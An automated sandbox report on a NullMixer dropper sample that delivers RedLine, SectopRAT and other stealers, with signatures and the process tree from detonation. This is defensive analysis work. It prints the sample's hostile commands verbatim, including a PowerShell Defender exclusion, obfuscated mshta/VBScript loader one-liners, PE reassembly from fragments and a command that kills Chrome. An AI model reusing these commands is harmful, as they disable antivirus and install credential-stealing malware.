Malware Analysis Report

2025-01-02 06:01

Sample ID 241124-1fjzsawqgj
Target 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
SHA256 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars ani she aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308

Threat Level: Known bad

The file 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars ani she aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan

PrivateLoader

SectopRAT

RedLine

Fabookie family

Socelars payload

RedLine payload

Fabookie

Socelars

NullMixer

Sectoprat family

Socelars family

Privateloader family

SectopRAT payload

Onlylogger family

Nullmixer family

Gcleaner family

GCleaner

Redline family

Detect Fabookie payload

OnlyLogger

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Drops Chrome extension

Looks up geolocation information via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 21:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win7-20240903-en

Max time kernel

5s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 272

C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$401C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 480

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

